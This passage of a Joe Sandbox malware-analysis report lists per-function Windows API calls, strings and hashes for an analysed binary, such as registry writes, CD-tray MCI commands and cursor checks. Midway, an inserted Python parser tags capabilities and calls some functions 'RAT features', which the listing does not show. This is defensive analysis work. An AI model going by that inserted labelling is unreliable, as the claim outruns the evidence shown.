                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 67714AB2D00209FBEB20DFE5DD45FBEBBBCAF44750F144125EA15A61A1D7319A06CBA0
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00A1CF1D
                                                                                                                                                                                                                                  • RegCreateKeyExW.ADVAPI32(?,?,00000000,00A2DCD0,00000000,?,00000000,?,?), ref: 00A1CFA4
                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 00A1D004
                                                                                                                                                                                                                                  • _wcslen.LIBCMT ref: 00A1D054
                                                                                                                                                                                                                                  • _wcslen.LIBCMT ref: 00A1D0CF
                                                                                                                                                                                                                                  • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000001,?,?), ref: 00A1D112
                                                                                                                                                                                                                                  • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 00A1D221
                                                                                                                                                                                                                                  • RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 00A1D2AD
                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 00A1D2E1
                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 00A1D2EE
                                                                                                                                                                                                                                  • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 00A1D3C0
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Value$Close$_wcslen$ConnectCreateRegistry
                                                                                                                                                                                                                                  • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                                                                                                                                                                                  • API String ID: 9721498-966354055
                                                                                                                                                                                                                                  • Opcode ID: cc8408a014811644f5260a8c4dba25dd61e4b9b43a255abc2f6b8b76b154d7c1
                                                                                                                                                                                                                                  • Instruction ID: e3c99e7f1bb024b1d314ea1482a4fa8cc4aa8771474780f1d28da90a89480281
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cc8408a014811644f5260a8c4dba25dd61e4b9b43a255abc2f6b8b76b154d7c1
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: AB125B35604201AFDB14DF58C895B6AB7E5FF88724F14885CF85A9B3A2CB35ED42CB81
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • CharUpperBuffW.USER32(?,?), ref: 00A21462
                                                                                                                                                                                                                                  • _wcslen.LIBCMT ref: 00A2149D
                                                                                                                                                                                                                                  • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00A214F0
                                                                                                                                                                                                                                  • _wcslen.LIBCMT ref: 00A21526
                                                                                                                                                                                                                                  • _wcslen.LIBCMT ref: 00A215A2
                                                                                                                                                                                                                                  • _wcslen.LIBCMT ref: 00A2161D
                                                                                                                                                                                                                                    • Part of subcall function 009AFD52: _wcslen.LIBCMT ref: 009AFD5D
                                                                                                                                                                                                                                    • Part of subcall function 009F3535: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 009F3547
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _wcslen$MessageSend$BuffCharUpper
                                                                                                                                                                                                                                  • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                                                                                                                                                                                  • API String ID: 1103490817-4258414348
                                                                                                                                                                                                                                  • Opcode ID: 06a4a8db05fd808eb4040363cc03ee54c63ccb8e0ed70c39f8c6d3a3f0bfb620
                                                                                                                                                                                                                                  • Instruction ID: b16ca0b7e92dd43e3724c31713f0a44613f541aae38e3ab7a05aacb08da4d06a
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 06a4a8db05fd808eb4040363cc03ee54c63ccb8e0ed70c39f8c6d3a3f0bfb620
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B4E19E716083118FCB14EF28D55096AB7E2FFE4314B1489ACF8969B3A2DB35ED45CB81
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _wcslen$BuffCharUpper
                                                                                                                                                                                                                                  • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                                                                                                                                                                                  • API String ID: 1256254125-909552448
                                                                                                                                                                                                                                  • Opcode ID: ca2fa45ec0a8ff3f87176647835f7b77da790810a2292a20ddf314c35676a4f7
                                                                                                                                                                                                                                  • Instruction ID: d86eed74b1a0b8e7400873a835df5ede1415113bc9619ea4e18278d864c8e032
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ca2fa45ec0a8ff3f87176647835f7b77da790810a2292a20ddf314c35676a4f7
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C87109326105268BCB109F7CCE506FB37A6AFA5764B210524FC66AB294EB35DDC5C3A0
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • _wcslen.LIBCMT ref: 00A28DB5
                                                                                                                                                                                                                                  • _wcslen.LIBCMT ref: 00A28DC9
                                                                                                                                                                                                                                  • _wcslen.LIBCMT ref: 00A28DEC
                                                                                                                                                                                                                                  • _wcslen.LIBCMT ref: 00A28E0F
                                                                                                                                                                                                                                  • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00A28E4D
                                                                                                                                                                                                                                  • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,00A26691), ref: 00A28EA9
                                                                                                                                                                                                                                  • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00A28EE2
                                                                                                                                                                                                                                  • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 00A28F25
                                                                                                                                                                                                                                  • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00A28F5C
                                                                                                                                                                                                                                  • FreeLibrary.KERNEL32(?), ref: 00A28F68
                                                                                                                                                                                                                                  • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00A28F78
                                                                                                                                                                                                                                  • DestroyIcon.USER32(?,?,?,?,?,00A26691), ref: 00A28F87
                                                                                                                                                                                                                                  • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00A28FA4
                                                                                                                                                                                                                                  • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00A28FB0
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
                                                                                                                                                                                                                                  • String ID: .dll$.exe$.icl
                                                                                                                                                                                                                                  • API String ID: 799131459-1154884017
                                                                                                                                                                                                                                  • Opcode ID: efa2aa3200b1970f20e2131d73e46854eb1b9e581a4aee8ce7e521b0222b0bc0
                                                                                                                                                                                                                                  • Instruction ID: 35470489539bb07dd3273da2032c0ae7c56f41dcc0557f91496b5f1c3f44fef8
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: efa2aa3200b1970f20e2131d73e46854eb1b9e581a4aee8ce7e521b0222b0bc0
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8C61F171900224BEEB24DF68DD45BFE77A8BF08B20F104526F815E60D2DB78E941CBA0
APIs
• CharLowerBuffW.USER32(?,?), ref: 00A0493D
• _wcslen.LIBCMT ref: 00A04948
• _wcslen.LIBCMT ref: 00A0499F
• _wcslen.LIBCMT ref: 00A049DD
• GetDriveTypeW.KERNEL32(?), ref: 00A04A1B
• mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00A04A63
• mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00A04A9E
• mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00A04ACC
Strings
Memory Dump Source
• Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
• Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_990000_End.jbxd
Similarity
• API ID: SendString_wcslen$BuffCharDriveLowerType
• String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
• API String ID: 1839972693-4113822522
• Opcode ID: 80a36f74cb7cc6e6b78b6bf9a644effa3b099e815e821a3896139929259626f0
• Instruction ID: 009749a4c4f142b63fcaf980641f5761971089b2bc2e61b2baaee1146aca214a
• Opcode Fuzzy Hash: 80a36f74cb7cc6e6b78b6bf9a644effa3b099e815e821a3896139929259626f0
• Instruction Fuzzy Hash: 6971F4B26082059FC710EF28E84096FB7E4FF98794F10492DF996972A1EB31DD49CB91
APIs
• LoadIconW.USER32(00000063), ref: 009F6395
• SendMessageW.USER32(?,00000080,00000000,00000000), ref: 009F63A7
• SetWindowTextW.USER32(?,?), ref: 009F63BE
• GetDlgItem.USER32(?,000003EA), ref: 009F63D3
• SetWindowTextW.USER32(00000000,?), ref: 009F63D9
• GetDlgItem.USER32(?,000003E9), ref: 009F63E9
• SetWindowTextW.USER32(00000000,?), ref: 009F63EF
• SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 009F6410
• SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 009F642A
• GetWindowRect.USER32(?,?), ref: 009F6433
• _wcslen.LIBCMT ref: 009F649A
• SetWindowTextW.USER32(?,?), ref: 009F64D6
• GetDesktopWindow.USER32 ref: 009F64DC
• GetWindowRect.USER32(00000000), ref: 009F64E3
• MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 009F653A
• GetClientRect.USER32(?,?), ref: 009F6547
• PostMessageW.USER32(?,00000005,00000000,?), ref: 009F656C
• SetTimer.USER32(?,0000040A,00000000,00000000), ref: 009F6596
Memory Dump Source
• Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
• Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_990000_End.jbxd
Similarity
• API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
• String ID:
• API String ID: 895679908-0
• Opcode ID: a80c886d87f53cc1d30fe55eee848cb8dc764398bbd3e46f7325b17fef798389
• Instruction ID: 8d9e0acf6ecaaf23f64be996b20b48742739c2be8b33836c6e1281d4054bb91d
• Opcode Fuzzy Hash: a80c886d87f53cc1d30fe55eee848cb8dc764398bbd3e46f7325b17fef798389
• Instruction Fuzzy Hash: B0716031900709AFDB20DFA8CE45BBEBBF9FF48704F104928E686A25A1D775E945CB50
APIs
• LoadCursorW.USER32(00000000,00007F89), ref: 00A10884
• LoadCursorW.USER32(00000000,00007F8A), ref: 00A1088F
• LoadCursorW.USER32(00000000,00007F00), ref: 00A1089A
• LoadCursorW.USER32(00000000,00007F03), ref: 00A108A5
• LoadCursorW.USER32(00000000,00007F8B), ref: 00A108B0
• LoadCursorW.USER32(00000000,00007F01), ref: 00A108BB
• LoadCursorW.USER32(00000000,00007F81), ref: 00A108C6
• LoadCursorW.USER32(00000000,00007F88), ref: 00A108D1
• LoadCursorW.USER32(00000000,00007F80), ref: 00A108DC
• LoadCursorW.USER32(00000000,00007F86), ref: 00A108E7
• LoadCursorW.USER32(00000000,00007F83), ref: 00A108F2
• LoadCursorW.USER32(00000000,00007F85), ref: 00A108FD
• LoadCursorW.USER32(00000000,00007F82), ref: 00A10908
• LoadCursorW.USER32(00000000,00007F84), ref: 00A10913
• LoadCursorW.USER32(00000000,00007F04), ref: 00A1091E
• LoadCursorW.USER32(00000000,00007F02), ref: 00A10929
• GetCursorInfo.USER32(?), ref: 00A10939
• GetLastError.KERNEL32 ref: 00A1097B
Memory Dump Source
• Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
• Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_990000_End.jbxd
Similarity
• API ID: Cursor$Load$ErrorInfoLast
• String ID:
• API String ID: 3215588206-0
• Opcode ID: 6a12742c8929868cc2cc69cd921c0fdc40a8885cd8efda8244c24a38d5d58782
• Instruction ID: 0b44be3b0f89a18882d3fe373df406f93acad1e963335a6d0dd5faa111ed3c00
• Opcode Fuzzy Hash: 6a12742c8929868cc2cc69cd921c0fdc40a8885cd8efda8244c24a38d5d58782
• Instruction Fuzzy Hash: D94154B0D083196ADB10DFBA8C89C6EBFE8FF44754B50452AE15CEB281DA789841CF91
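The per-function listings above (the mciSendStringW function whose String IDs are MCI "cdaudio"/"set cd door" commands, and the function that loads sixteen stock cursors before calling GetCursorInfo) are easier to triage in bulk than by eye. The script below is an added example, not Joe Sandbox code: it parses this record format (an "APIs" block, optional "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin" and "Similarity" blocks) into structured records keyed by Opcode ID and attaches heuristic capability tags. The tag names and thresholds are the author's assumptions, and the sample input is a trimmed, constructed copy of the records on this page, including a record whose Similarity block is absent so the fallback key path is exercised.

```python
"""Parse Joe Sandbox per-function API listings and tag what each function can do."""
import re
from collections import namedtuple
from dataclasses import dataclass, field

# Constructed sample: trimmed copies of the records above, plus one record whose
# Similarity block is absent (as at the end of this section) to exercise that path.
SAMPLE = """\
APIs
• CharLowerBuffW.USER32(?,?), ref: 00A0493D
• _wcslen.LIBCMT ref: 00A04948
• GetDriveTypeW.KERNEL32(?), ref: 00A04A1B
• mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00A04A63
• mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00A04ACC
Strings
Memory Dump Source
• Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
Similarity
• API ID: SendString_wcslen$BuffCharDriveLowerType
• String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
• Opcode ID: 80a36f74cb7cc6e6b78b6bf9a644effa3b099e815e821a3896139929259626f0
APIs
• LoadCursorW.USER32(00000000,00007F89), ref: 00A10884
• LoadCursorW.USER32(00000000,00007F8A), ref: 00A1088F
• LoadCursorW.USER32(00000000,00007F00), ref: 00A1089A
• LoadCursorW.USER32(00000000,00007F03), ref: 00A108A5
• GetCursorInfo.USER32(?), ref: 00A10939
• GetLastError.KERNEL32 ref: 00A1097B
Similarity
• API ID: Cursor$Load$ErrorInfoLast
• String ID:
• Opcode ID: 6a12742c8929868cc2cc69cd921c0fdc40a8885cd8efda8244c24a38d5d58782
APIs
• __scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 009B0436
  • Part of subcall function 009B045D: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,009D2733,000000FF), ref: 009B04A8
  • Part of subcall function 009B045D: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 009B04BE
Strings
• InitializeConditionVariable, xrefs: 009B04B8
"""

SECTIONS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}
API_RE = re.compile(r"^•\s+(?:Part of subcall function (?P<sub>[0-9A-F]+):\s+)?"
                    r"(?P<api>\w+)\.(?P<mod>\w+)(?:\((?P<args>[^)]*)\))?,?\s+ref:\s+(?P<ref>[0-9A-F]+)$")
STR_RE = re.compile(r"^•\s+(?P<s>.*?), xrefs: (?P<ref>[0-9A-F]+)$")
KV_RE = re.compile(r"^•\s+(?P<k>[^:]+):\s*(?P<v>.*)$")

ApiCall = namedtuple("ApiCall", "api module args ref subcall")  # subcall: callee address or None

@dataclass
class FunctionRecord:
    apis: list = field(default_factory=list)
    strings: list = field(default_factory=list)   # entries of the Strings block
    fields: dict = field(default_factory=dict)    # key/value bullets of the other blocks

    @property
    def key(self):
        # Opcode ID is the stable per-function key; fall back to the first ref when it is missing.
        return self.fields.get("Opcode ID") or (self.apis[0].ref if self.apis else "?")

    def api_names(self):
        return {a.api for a in self.apis}

    def string_ids(self):
        return [s.strip() for s in self.fields.get("String ID", "").split("$") if s.strip()]

def parse_records(text):
    records, section, rec = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if line in SECTIONS:
            section = line
            if section == "APIs":          # each function listing opens with its APIs block
                rec = FunctionRecord()
                records.append(rec)
            continue
        if rec is None or not line.startswith("•"):
            continue
        if section == "APIs":
            m = API_RE.match(line)
            if m:
                rec.apis.append(ApiCall(m["api"], m["mod"], m["args"] or "", m["ref"], m["sub"]))
        elif section == "Strings":
            m = STR_RE.match(line)
            if m:
                rec.strings.append(m["s"])
        else:
            m = KV_RE.match(line)
            if m:
                rec.fields[m["k"].strip()] = m["v"].strip()
    return records

def tag_capabilities(rec):
    """Heuristic labels (assumptions, not Joe Sandbox output) from the API set plus strings."""
    names, tags = rec.api_names(), []
    text = " ".join(rec.string_ids() + rec.strings).lower()
    if "mciSendStringW" in names and ("cdaudio" in text or "cd door" in text):
        tags.append("cd_tray_control")  # MCI "set cd door open/closed" ejects or closes the tray
    if "GetDriveTypeW" in names:
        tags.append("drive_type_query")
    if "GetCursorInfo" in names and sum(a.api == "LoadCursorW" for a in rec.apis) >= 4:
        tags.append("cursor_shape_identification")  # stock cursors loaded to compare with the current one
    gpa = [a for a in rec.apis if a.api == "GetProcAddress"]
    if gpa and "GetModuleHandleW" in names:
        # CRT startup resolves the condition-variable APIs this way too: mark the tag weak
        # when every GetProcAddress hit comes from a subcall rather than the function itself.
        tags.append("dynamic_api_resolution" + ("_via_subcall" if all(a.subcall for a in gpa) else ""))
    return tags

def analyze(text):
    return {r.key: tag_capabilities(r) for r in parse_records(text)}

if __name__ == "__main__":
    for key, tags in analyze(SAMPLE).items():
        print(key, tags)
```

Running it over the full listing instead of SAMPLE separates RAT feature functions (CD tray control, cursor identification) from CRT boilerplate such as the `__scrt_initialize_thread_safe_statics` record, whose GetProcAddress use is tagged as weak because it only appears in a subcall.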
APIs
• __scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 009B0436
  • Part of subcall function 009B045D: InitializeCriticalSectionAndSpinCount.KERNEL32(00A6170C,00000FA0,60C2A4BD,?,?,?,?,009D2733,000000FF), ref: 009B048C
  • Part of subcall function 009B045D: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,009D2733,000000FF), ref: 009B0497
  • Part of subcall function 009B045D: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,009D2733,000000FF), ref: 009B04A8
  • Part of subcall function 009B045D: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 009B04BE
  • Part of subcall function 009B045D: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 009B04CC
  • Part of subcall function 009B045D: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 009B04DA
  • Part of subcall function 009B045D: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 009B0505
  • Part of subcall function 009B045D: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 009B0510
• ___scrt_fastfail.LIBCMT ref: 009B0457
  • Part of subcall function 009B0413: __onexit.LIBCMT ref: 009B0419
Strings
• InitializeConditionVariable, xrefs: 009B04B8
• SleepConditionVariableCS, xrefs: 009B04C4
• api-ms-win-core-synch-l1-2-0.dll, xrefs: 009B0492
• WakeAllConditionVariable, xrefs: 009B04D2
• kernel32.dll, xrefs: 009B04A3
Memory Dump Source
• Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
                                                                                                                                                                                                                                  • String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                                                                                                                                                                                                  • API String ID: 66158676-1714406822
                                                                                                                                                                                                                                  • Opcode ID: bd208e18f29552aecbff149b29ebe9bba9d2471583f0f0f13ab28a600ea1fb46
                                                                                                                                                                                                                                  • Instruction ID: 2c91876aface1d165d1d6c7186b2e6417b946d4d1b596ae028d13fbafb1ec18d
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bd208e18f29552aecbff149b29ebe9bba9d2471583f0f0f13ab28a600ea1fb46
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3021CC32A447147BD7309BE8AD06BEB37E9FBC4BB1F140525F90597691DBB498028950
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _wcslen
                                                                                                                                                                                                                                  • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                                                                                                                                                                                  • API String ID: 176396367-1603158881
                                                                                                                                                                                                                                  • Opcode ID: 62aa3d28e0c3aff0a9969f773daa9a06c023e29e644dd21c24ce02d4dd8e82fb
                                                                                                                                                                                                                                  • Instruction ID: f0947998836bf7b77f20b09d4ee42c5d472c08db88d2a3a20dfb8ae64440f4f7
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 62aa3d28e0c3aff0a9969f773daa9a06c023e29e644dd21c24ce02d4dd8e82fb
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2AE1E532A0051AABCF149FB8C8517FDFBB8BF54710F50C119EA56E7250DB38AE499790
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • CharLowerBuffW.USER32(00000000,00000000,00A2DCD0), ref: 00A04F6C
                                                                                                                                                                                                                                  • _wcslen.LIBCMT ref: 00A04F80
                                                                                                                                                                                                                                  • _wcslen.LIBCMT ref: 00A04FDE
                                                                                                                                                                                                                                  • _wcslen.LIBCMT ref: 00A05039
                                                                                                                                                                                                                                  • _wcslen.LIBCMT ref: 00A05084
                                                                                                                                                                                                                                  • _wcslen.LIBCMT ref: 00A050EC
                                                                                                                                                                                                                                    • Part of subcall function 009AFD52: _wcslen.LIBCMT ref: 009AFD5D
